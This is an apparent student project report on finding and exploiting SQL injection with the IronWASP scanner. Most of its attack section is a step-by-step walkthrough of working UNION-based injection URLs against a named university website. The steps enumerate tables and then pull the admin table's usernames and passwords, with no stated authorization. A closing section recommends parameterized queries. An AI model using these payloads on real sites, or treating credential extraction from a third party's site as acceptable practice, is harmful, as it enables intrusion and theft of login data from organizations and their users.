SQL Injection - Project Report
8/10/2019 SQL Injection - Project Report
PREFACE
It gives me a sense of satisfaction and pleasure at the same time while writing the
preface for the IRONWASP project report. It took several weeks of immense hard work and tiredness to complete this project.
My intention has been to produce a report which covers all the aspects of this project
completely. Therefore, I have presented the project report in a way which is accessible to
everyone.
As the use of computers in industry, commerce, education and many other fields of
life has become very common, the question of information and system security arises.
Avoiding attacks on information and networks is not easy; it requires a lot of effort.
This report discusses SQL injection vulnerability identification and attacking.
A thorough study has been carried out of the topic. All the material has been collected
in relevance to the SQL injection vulnerability. This report is carefully designed to offer
information appropriate to the SQL injection vulnerability. All the topics are comprehensively
dealt with to give the reader a firm grounding in the issue. Explanations of concepts and
principles are concise and written in clear and simple language with supportive illustrations
where required. Different diagrams are provided to make this report even more logical and
understandable for the reader.
Muhammad Burhan
INTRODUCTION
1 Introduction
This chapter gives a brief introduction to the project. It provides the objective,
theoretical background and project scope.
1.1 Objective
The aim of my project is to scan a website with IRONWASP to detect an SQL injection
vulnerability, and then to attack the affected website using SQL injection.
1.2 Theoretical Background
What is SQL injection?
SQL injection is a code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker).
What is software vulnerability?
A software vulnerability is a security flaw, glitch, or weakness found
in software or in an operating system (OS) that can lead to security concerns. An
example of a software flaw is a buffer overflow.
What is IronWASP?
IronWASP (Iron Web Application Advanced Security testing Platform) is a free,
open-source web application vulnerability scanner with a GUI and a built-in scripting engine.
1.3 Project Scope
1- To understand and demonstrate the working of IronWASP.
2- Identify vulnerabilities using IronWASP.
3- Perform an attack using SQL injection.
Figure 1: Iron WASP Interface
2.2 Reasons for Iron WASP Selection
1- It's Free and Open source.
2- GUI based and very easy to use, no security expertise required.
3- Powerful and effective scanning engine.
4- Supports recording Login sequence.
5- Reporting in both HTML and RTF formats.
6- Checks for over 25 different kinds of web vulnerabilities.
7- False Positives detection support.
8- False Negatives detection support.
9- Industry leading built-in scripting engine that supports Python and Ruby.
10- Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.
11- Comes bundled with a growing number of Modules built by researchers in the
security community.
The university offers several undergraduate programs (BS, BSc, BBA, etc.) as well as
graduate programs (MBA, etc.). Figure 3 shows the SQL injection vulnerability that IronWASP
detected on the university website (i.e. http://www.thelaureate.edu.pk).
Figure 2: Target website.
Figure 3: SQL Injection Vulnerability Detected
2.3 Start Attack
Step 1: Use the ORDER BY clause to find the number of columns returned by the vulnerable query.
Append ORDER BY 1, 2, 3 ... n to the injectable parameter and increase n until the database returns an error.
For example:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3
:
:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7
Figure 4 shows that ORDER BY 7 produces the error shown, which means the query
that displays the page data returns only 6 columns.
Figure 4: Error on the 7th column.
Step 2: Finding the columns that are displayed on the page.
To find which of the 6 columns are rendered on the web page, we use a UNION SELECT
with a numbered placeholder in each position; the numbers that show up in the page mark the
displayed columns. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1
Figure 5: Displayed Columns.
Step 3: Using the group_concat function.
The group_concat function is used to list all table names of the current
schema in a single displayed column. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1
The above request displayed the tables belonging to the current schema:
admin, e-news, email_group, email_management, image_gallery, images_listing, navigation, navigation_bk, news_and_events, notice_board and pages.
Figure 6: Table names.
Step 4: Find the hex of the target table name.
The table name is supplied as a hex literal (0x...) so that the payload contains no
quote characters; MySQL treats 0x61646d696e as the string admin. The admin table looks the
most interesting, so I convert admin to hex, which is 61646d696e.
Step 5: Finding column names of the table.
Group_concat is used again to display the column names. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1
Figure 7: Shows the column names of admin table.
Step 6: Retrieving data.
In the last step I successfully retrieved the column names (i.e. username and
password). So I use the URL below to retrieve the data. Figure 8 shows the results from the admin table.
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1
Figure 8: Shows the data of admin table.
Step 7: Beyond this is not ethical.
I feel that moving ahead to delete, modify or insert data into the tables is
not ethical.
Chapter 3
CONCLUSION
3 Conclusion
As demonstrated above, a single injectable parameter is enough to read arbitrary data
through a UNION SELECT; depending on the database driver and the privileges of the application
account, an attacker could also insert, update or delete data and database objects (tables,
views, etc.) using SQL injection.
Therefore desktop and web applications should be built to secure coding standards to avoid
such attacks, in particular by passing user input to the database through parameterized queries
instead of concatenating it into the SQL text. Nowadays several software products are available
that identify such vulnerabilities in web and desktop applications.
APPENDIX A
WEB REFERENCES
[1] http://www.thelaureate.edu.pk (Target Website)
[2] http://string-functions.com/string-hex.aspx (Convert String to Hex)